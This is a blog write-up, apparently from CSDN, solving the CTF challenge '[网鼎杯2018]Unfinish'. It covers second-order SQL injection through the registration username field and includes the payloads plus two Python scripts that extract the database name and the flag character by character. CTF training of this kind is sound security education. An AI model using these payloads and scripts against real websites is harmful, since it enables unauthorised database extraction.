[网鼎杯]2018Unfinish

于 2024-08-05 12:34:16 发布
阅读量479 收藏 6
点赞数 4
文章标签: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60286636/article/details/140923723
版权

使用ctf在线靶场https://adworld.xctf.org.cn/home/index。

进入靶场,发现是一个登录页面。

在这里插入图片描述

使用awvs进行扫描,发现存在login.php和register.php,并且register.php存在sql注入漏洞。

在这里插入图片描述

访问一下register.php试试,发现是一个注册页面。

在这里插入图片描述

在邮箱、用户名、密码分别尝试sql注入。

发现邮箱后面不允许添加符号’等,密码添加’等会被当做字符传入,而在用户名的地方输入’,注册失败,怀疑是在用户名处存在sql注入。

随便注册一个试试。

在这里插入图片描述

登陆进去发现,在页面中存在用户名的显示。

在用户名处输入

dhh ' and '1'='1

注册成功,登陆查看用户名为0。基本确定为二次注入,注入点为用户名处。

在这里插入图片描述

使用burp判断被过滤的字符。初步爆破发现单引号、逗号、information被过滤。那就开始尝试

注册时,让用户名为select database(),尝试一下。

登陆后发现,用户名直接显示为select database()。那么猜测应该是被单引号或者双引号包裹起来,作为字符串了,尝试两种闭合。

在这里插入图片描述

使用1’+2+'1可以注册成功,那就证明单引号没被过滤掉,而且可以看出来后台接收语句应该是select…where username=‘username’。

开始尝试构建payload。

0'+database()+'0     #结果为0

在这里插入图片描述

尝试使用ascii进行转换为10进制尝试,下面是转换database()的第一个字符。

0'+ascii(substr((database()) from 1 for 1))+'0

在这里插入图片描述

查看ascii表,发现119为w,也就是当前数据库第一个字母为w。那证明目前的思路是正确的。

写python脚本进行爆破。

import requests
from bs4 import BeautifulSoup


def jieguo():
    name = ''
    url = 'http://61.147.171.105:58807/'
    url1 = url + 'register.php'
    url2 = url + 'login.php'
    for i in range(1, 100):
        data_register = {"email": f"dhh{i}@163.com",
                         "username": f"0'+ascii(substr((database()) from {i} for 1))+'0;",
                         "password": "123"}
        data_login = {"email": f"dhh{i}@163.com",
                      "password": "123"}
        response_regiseter = requests.post(url1, data=data_register)
        response_login = requests.post(url2, data=data_login)
        bs = BeautifulSoup(response_login.text, 'html.parser')  # bs4解析页面
        username = bs.find('span', class_='user-name')  # 取返回页面数据的span class=user-name属性
        number = username.text  # 取该属性的数字
        name += chr(int(number))
        print(name)


if __name__ == '__main__':
    jieguo()

在这里插入图片描述

额…不知道为什么爆破完库名之后还在输出。

目前为止二次注入的目的完成。

因为我们的目的不是为了拿到flag,所以我就上网查询了一下如何拿flag,并且写成payload

0'+ascii(substr((select * from flag) from 1 for 1))+'0

import requests
from bs4 import BeautifulSoup


def jieguo():
    name = ''
    url = 'http://61.147.171.105:58807/'
    url1 = url + 'register.php'
    url2 = url + 'login.php'
    for i in range(1, 100):
        data_register = {"email": f"dh{i}@163.com",
                         "username": f"0'+ascii(substr((select * from flag) from {i} for 1))+'0;",
                         "password": "1"}
        data_login = {"email": f"dh{i}@163.com", "password": "1"}
        response_regiseter = requests.post(url1, data=data_register)
        response_login = requests.post(url2, data=data_login)
        bs = BeautifulSoup(response_login.text, 'html.parser')  # bs4解析页面
        username = bs.find('span', class_='user-name')  # 取返回页面数据的span class=user-name属性
        number = username.text  # 取该属性的数字
        name += chr(int(number))
        print(name)


if __name__ == '__main__':
    jieguo()

在这里插入图片描述

头发巨多不做程序猿
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
【复习】BUUCTF:[网鼎杯2018]Unfinish --- python爬虫 + re sql注入,substr二次注入,hex二次注入 不用bool注入点的substr
Zero_Adam的博客
05-04 1136
目录:一、自己做:二、学到的三、 学习WPpython爬虫 + re 尝试(尝试思路,):1. substr思路:最后的payloadhex思路: 一、自己做: 测试,看到用户名有回显,那么就是又一次从数据库中查询数据,可能有SQL注入的可能,然后我在注册用户名的时候,加上了 ',然后就死活注册不了,, 也不给我报错,,我在这里也想了一会,,想不明白 后来想到了,可能是报错,然后就没执行,然后我用了万能密码来的。 用户名:a'1 or '1。 你注册成功后,他就会自动跳转到login.php的。 然后用邮箱
[网鼎杯 2018]unfinish.md
09-05
[网鼎杯 2018]unfinish.md
网鼎杯 2018 unfinish
feng的博客
10-29 2709
前言 又是一道SQL注入的题目,只能说自己还是太菜。。会的知识太少, WP 进入环境,用dirsearch扫一下,发现有index.php,login.php,register.php。 经过很多的尝试,最终发现这是一个二次注入的题目,注入点是在register.php传入的username中。 接下来就是如何注入了。我一开始考虑报错注入,但是发现不成功。经过尝试,发现过滤了逗号。这就意味了不能进行报错注入,而且不能通过闭合INSERT后面的(A,B,C)来实现注入。 这里我尝试进行union注入,但是过滤
[网鼎杯2018]Unfinish
东隅的博客
10-11 761
另外,‘0’+123+'0’这样的注入进去是123,这样可以直接读到内容,这里的数字嘛,我们可以把想得到的东西进行两次hex()就好了,但是两次hex()之后注入数据库的数字变成了小数,这里可以用substr截取,而逗号被过滤了,如何不用逗号进行截取又是新的知识点,学到了:substr(str from 1 for 10) 这个样子。这个跟php的弱类型差不多的,‘’+(我们的盲注)+‘’,我们盲注的结果返回1那这里username就会变成1,反之为0。注册的时候用户名这样写:(注意单引号不能漏)
网鼎杯-2018-unfinish解题方法
Lemon_miko的博客
04-27 539
这里我们会发现登录不进去也没有注册界面以及源码,这里我们需要获取它其他的一些界面找注入机会,这里有两种方式找其他界面,一种是猜这里是登录界面那么必定就会有注册界面一般注册界面的名字无非就是reg.php,register.php这是register.php界面当然这种就是靠运气和我们的经验了。在mysql中+只是一个运算符所以我们可以用此方式来获取数据库的ascii码值当然这里也可以使用16进制的方式但要注意的一点是如果hex值过长需要进行截断以及如过算出的hex值是字符会被截断因此需要两次16进制转化。
SQL注入网鼎杯2018-unfinish
qq_68163788的博客
02-21 1265
SQL注入是一种常见的网络安全漏洞,攻击者利用该漏洞向应用程序的数据库中插入恶意的SQL代码,从而实现对数据库的非法访问或控制。攻击者可以通过SQL注入攻击获取敏感数据、修改数据、删除数据,甚至完全控制数据库
[网鼎杯2018]Unfinish 数据库注入‘+‘的利用
qq_54929891的博客
05-22 731
试一下万能账号登录1'or'1'='1'#,发现有邮箱格式,1@1’or'1'='1'#结果提示@后面不能有引号,算了去register.php瞅瞅,这种看url一般都有的 随便注册一个登录试试 发现用户名被回显到上面了,看来应该考的是二次注入了(这里注意每测试一次就要注册一个新的邮箱,不然用户名不会更改), 再用1'or'1'='1'#判断一下,结果注册失败!!!%23和-- 都不行可能是被过滤掉了,而且你单独输入一个#又会显示注册成功不知道 但我们输入1'or'1'='1进行前后引号闭合的..
记录BUUCTF [网鼎杯2018]Unfinish1解题思路
Aiwin的博客
05-18 1131
记录BUUCTF [网鼎杯2018]Unfinish1解题思路
[网鼎杯2018]Unfinish 两种方法 -----不会编程的崽
不会编程的崽的博客
03-26 1195
网鼎杯 二次注入 盲注
BUUCTF--[网鼎杯2018]Unfinish
qq_46263951的博客
07-14 794
首先进入页面后我们发现有两个输入框,简单尝试后并没有发现可用漏洞,使用dirsearch扫描后找到一个register.php 进入register.php我们可以进行注册,成功注册后可以发现登录进去后账户名显示出来了,推测存在二次注入 方法一: HEX:返回十六进制数值表示形式 import requests login_url='http://220.249.52.133:39445/login.php' register_url='http://220.249.52.133:39.
网鼎杯2018-二次注入unfinish绕过
lizhiiiii的博客
03-07 469
我们可以通过转两次十六进制来得到库名(如果只转一次十六进制如果转出的十六进制中有英文字母那么英文字母后面的数字就会被截断 我们得到的就不是完整的数字)
Part_CAE_Unfinish.rar
06-15
在“Part_CAE_Unfinish.rar”这个压缩包中,我们可能找到一系列与UG有限元分析相关的实例教程,这对于初学者来说是极好的学习资源。 在有限元分析中,首先需要对模型进行网格划分,UG提供了多种网格类型,如四面体...
微信小程序 setData 对 data数据影响问题
10-17
uniqueitem: (id == 'unfinish') ? this.data.itemleft[index] : this.data.itemright[index], baninput: (id == 'unfinish')?false:true }); var that = this; wx.getStorage({ key: 'item', success: ...
ASP基于BS结构的学生在线选课系统的实现(源代码+论文).rar
08-10
资源包主要包含以下内容: ASP项目源码:每个资源包中都包含完整的ASP项目源码,这些源码采用了经典的ASP技术开发,结构清晰、注释详细,帮助用户轻松理解整个项目的逻辑和实现方式。通过这些源码,用户可以学习到ASP的基本语法、服务器端脚本编写方法、数据库操作、用户权限管理等关键技术。 数据库设计文件:为了方便用户更好地理解系统的后台逻辑,每个项目中都附带了完整的数据库设计文件。这些文件通常包括数据库结构图、数据表设计文档,以及示例数据SQL脚本。用户可以通过这些文件快速搭建项目所需的数据库环境,并了解各个数据表之间的关系和作用。 详细的开发文档:每个资源包都附有详细的开发文档,文档内容包括项目背景介绍、功能模块说明、系统流程图、用户界面设计以及关键代码解析等。这些文档为用户提供了深入的学习材料,使得即便是从零开始的开发者也能逐步掌握项目开发的全过程。 项目演示与使用指南:为帮助用户更好地理解和使用这些ASP项目,每个资源包中都包含项目的演示文件和使用指南。演示文件通常以视频或图文形式展示项目的主要功能和操作流程,使用指南则详细说明了如何配置开发环境、部署项目以及常见问题的解决方法。 毕业设计参考:对于正在准备毕业设计的学生来说,这些资源包是绝佳的参考材料。每个项目不仅功能完善、结构清晰,还符合常见的毕业设计要求和标准。通过这些项目,学生可以学习到如何从零开始构建一个完整的Web系统,并积累丰富的项目经验。
基于SSM的高校实验室预约管理系统的设计与实现源码
08-10
本系统结合当前实验室预约、使用和管理中存在的问题和现状进行分析,设计一套可以解决实验室使用冲突、预约流程简单的实验室预约管理系统,满足实验室的在线预约申请与审核的基本需求,可以方便对实验室和实验室设备进行信息化管理。本系统中的教师可以查看当前实验室以及设备的基本信息,在线进行实验室的预约。管理员可以对实验室和实验室的设备进行管理,以及实验室的预约申请进行审核。
毕业设计javajsp超市会员管理系统ssm源码含文档工具包
08-10
毕业设计javajsp超市会员管理系统ssm源码含文档工具包 后台是ssm框架,页面是jsp,数据库mysql,jdk1.8,开发工具用ecplise、myecplise、sts、idea都可以 会员管理 公告育理 评论管理 前台 邮箱管理 积分管理 帮动 修改密码 退出系统 会员管理 公告管理 评论管理 工具管理 包含:源码、数据库脚本、论文、答辩ppt、开题报告、环境工具包、相同框架项目的安装教程(在说明文档中)
STM32F103C8T6 CAN通讯HAL库代码,采用中断接收,含Stm32CubeMX工程
最新发布
08-10
STM32F103C8T6 CAN通讯HAL库例程代码,采用中断接收,含Stm32CubeMX工程
c++的概要介绍与分析
08-10
C++是一种广泛使用的编程语言,它以其强大的功能和灵活性在计算机科学领域占据重要地位。以下是对C++资源的详细描述: 一、C++概述 C++是在C语言的基础上发展而来的,它保留了C语言的简洁、高效和接近硬件等特点,并增加了面向对象编程的支持。C++支持面向过程和面向对象的程序设计方法,使得开发者能够根据需要灵活选择编程范式。 二、C++特点 高效性:C++生成的代码质量高,程序执行效率高,仅比汇编语言慢10%~20%。 面向对象:支持封装、继承和多态等面向对象编程特性,便于构建复杂系统。 兼容性:与C语言高度兼容,绝大多数C语言程序可以不经修改在C++环境中运行。 可扩展性:支持泛型编程、模板等高级特性,提高了代码的可重用性和可维护性。 三、学习资源 官方文档:C++标准委员会发布的官方文档是了解C++语言特性的权威资源。 书籍:《C++ Primer》、《Effective C++》等经典书籍是学习C++的必备资料,它们详细介绍了C++的语法、特性和最佳实践。 在线课程:Coursera、网易云课堂等在线教育平台提供了丰富的C++课程,适合不同水平的学习者。 社区和论坛:Stac
AE文字动画预设,AE文字动画预设
08-10
AE文字动画预设
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

头发巨多不做程序猿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值